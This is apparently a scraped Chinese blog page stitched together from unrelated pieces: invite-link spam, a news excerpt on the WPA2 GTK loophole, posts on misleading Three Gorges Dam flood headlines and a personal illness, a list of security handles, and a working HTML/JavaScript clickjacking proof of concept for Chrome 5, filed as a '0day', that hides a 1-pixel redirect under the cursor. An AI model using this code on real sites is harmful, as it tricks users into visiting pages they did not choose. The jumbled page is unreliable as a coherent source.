http://t.qq.com/invite/f027eeb69a31c99d7d6b
http://t.qq.com/invite/47ca6fc145c8254a2b41
http://t.qq.com/invite/ff6029693e3fde04b359
http://t.qq.com/invite/a646181462561f2b74ed
http://t.qq.com/invite/d3aa8de02f7ac9f09cc3
http://t.qq.com/invite/943cf629e6785f8e75f1
http://t.qq.com/invite/82b8001334b3c1c92b57
http://t.qq.com/invite/6a848523a8c5a2eb562f
http://t.qq.com/invite/b1f3685ed6acdb2f6655
http://t.qq.com/invite/0a5de6acc5985fad4fd1
http://t.qq.com/invite/d17e67ca45f236eaa23f
http://t.qq.com/invite/6baabe1d003a6075c11f
http://t.qq.com/invite/577c2fe4381956890589
http://t.qq.com/invite/641ed2fa9af4d3233a91
WPA2 uses two types of keys: 1) Pairwise Transient Key (PTK), which is unique to each client, for protecting unicast traffic; and 2) Group Temporal Key (GTK) to protect broadcast data sent to multiple clients in a network. PTKs can detect address spoofing and data forgery. "GTKs do not have this property," according to page 196 of the IEEE 802.11 standard.
These six words comprise the loophole, Ahmad says.
Because a client has the GTK protocol for receiving broadcast traffic, the user of that client device could exploit GTK to create its own broadcast packet. From there, clients will respond to the sending MAC address with their own private key information.
Ahmad says it took about 10 lines of code in open source MadWiFi driver software, freely available on the Internet, and an off-the-shelf client card for him to spoof the MAC address of the AP, pretending to be the gateway for sending out traffic. Clients who receive the message see the client as the gateway and "respond with PTKs", which are private and which the insider can decrypt, Ahmad explains.
http://www.networkworld.com/newsletters/wireless/2010/072610wireless1.html
最近这张图片非常火。
相关的新闻:
《三峡大坝固若金汤,可以抵挡万年一遇洪水》
《三峡工程今年可防千年一遇洪水》(原始标题的新闻找不到了)
《三峡大坝可抵御百年一遇特大洪水》原文发在新华网上时间是 2006 年,而搜狐转载却是在 2008 年。
《长江水利委:不能把希望都寄托在三峡大坝上》
发这个图片的人不知道是不是为了安排“剧情”,而特地筛选过图片。其中 2006 年的新华网原文没有选择,却选择了 2008 年搜狐编辑“挖坟”转贴的旧文。
《三峡大坝固若金汤,可以抵挡万年一遇洪水》强调的是设计标准是抵御“万年一遇”的洪水:“按照设计,三峡大坝必须抵挡万年一遇的长江洪水”。2006 年原文发在新华网上的新闻《三峡大坝可抵御百年一遇特大洪水》说的是三峡大坝未竣工的情况下,2006 年就具备了抵御“百年一遇”洪水的能力,而且新闻最后强调“三峡开始发挥防洪能力并非意味着长江防洪可以高枕无忧。长江干堤是抵御长江中下游洪水的直接屏障”。而《三峡工程今年可防千年一遇洪水》新闻中明确说到“今年三峡枢纽的防洪标准定位为千年一遇”。
初一看,觉得标题党害死人啊!可是再想想,不是我们自己的浅阅读习惯导致的么?没有人深究探索,没有人认真。这是这个时代的悲哀啊。
另外,这一期的《南方周末》上面提到关于”X 年一遇”洪水的标准:
水利学界界定的洪水标准为:二十年一遇洪水流量为72300立方米/秒,百年一遇洪水流量为83700立方米/秒,千年一遇洪水流量为98800立方米/秒,万年一遇洪水流量为113000立方米/秒,可能最大洪水的洪水流量为120000~127000立方米/秒。
唉,浅阅读害死人啊!!
©2010 乌托邦. All Rights Reserved.
.本来就一个眼疼,后来扩散到好多病。。去“同立德”医院挂了两天的点滴,效果不佳。。。今天早上起床,又大便出血,有些担心,然后下午和ben总一起去了浙二医院,拿了百十块的眼药。马上折道去浙一医院,看肠外科,被医生无耻的暴了我的小菊花,啊!!!!然后确诊为”肛裂“,给我开了几百块钱的药。。哎,大悲剧啊。。。回家一看药的使用方法,还有两个直接塞进行的,擦~ 想起来就难受啊。。。看了三次,花了 800 左右,真贵啊!
好了,文章的目的是为了希望自己和大家注意身体,我决定做以下调整:
1、朋友喝酒--->朋友喝茶
2、在家抽烟--->在家看书
3、其他无意义的事情--> 逛街爬山
4、多吃水果啊,多吃水果!
上上周公司还搞了一个宣传,有一句话叫:有时间看住院看病,却没时间锻炼身体!
祝福大家身体健康,革命本钱别丢了啊,不要学我!我错了,我改了~~~~~~~~~~~~~~~~
POC:
<html><head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>Demo</title>
</head>
<body>
<div id="sH" onmouseover="document.location='http://www.baidu.com';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 1px; height: 1px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div>
<script>
function spoof(evt)
{
clickjacking_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjacking_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('sH').style.left=clickjacking_mouseX-0;
document.getElementById('sH').style.top=clickjacking_mouseY-0;
}
</script>
<center>
<br>
<center>
<h1><font face="Comic Sans MS">Chrome 5.0.375.99 ClickJacking POC</font></h1>
<div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px">
<b><br><br>
<a href="http://www.google.com" onclick="spoof(event)">Go To The Google?</a></b>
</div>
<font face="Comic Sans MS">Have Fun :)</font>
</center>
</center></body></html>
效果:
―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
当鼠标移到链接上时,状态栏依然显示http://www.google.com
当点击了链接后,页面会跳转到百度。
不知道你注意到图片左上角那仅有1像素的黑点没?秘密就在那里 :) 阅读全文
类别:0day 查看评论
- 0x37
- 0xfei
- 80sec
- 80sex
- alert7
- amxku
- apollo
- apple
- axis
- ayarei
- azy
- baicker
- bugvuln
- catspar
- chuchengyun
- cjf
- cnhawk
- cnhulk
- cnqing
- cocoruder
- coolc
- CoolQ
- CUIT
- cyg07
- daishuo
- dangguai27
- danielwa
- darkness
- dummy
- evil0x86
- flashsky
- flier
- flowercode
- fuzzfans
- GaRY
- glacier
- greysign
- gz1x
- hackloft
- heizi
- hiheige
- icbm
- jamba1aya
- Kevin
- killvxk
- kj021320
- kkqq
- kruglinski
- kxlzx
- lake2
- lcx
- lewis
- linuxetc
- linx
- lisl03
- luoluo
- met3or
- mix
- mj0011
- mrcool
- neeao
- newbiecoder
- noop
- nuke
- OYXin
- pjf
- putid
- qmzm
- rhett
- ring04h
- robinh00d
- s4m
- sbilly
- Scott&CDrea
- ShadowHider
- shinest
- softrce
- sowhat
- sudami
- suddy
- sunwear
- swan
- sysnap
- tombkeeper
- vessial
- vfocus
- void
- WASGuard
- way7t
- wi4r
- wlj
- wordexp
- woyigui
- www417
- wzt
- xeye
- xi4oyu
- xisigr
- xsolve
- xuanliang
- xyzreg
- ycosxhack
- yuange
- yunshu
- zeta
- zhaohuan
- zhouzhen
- zwell
- zzzevazzz
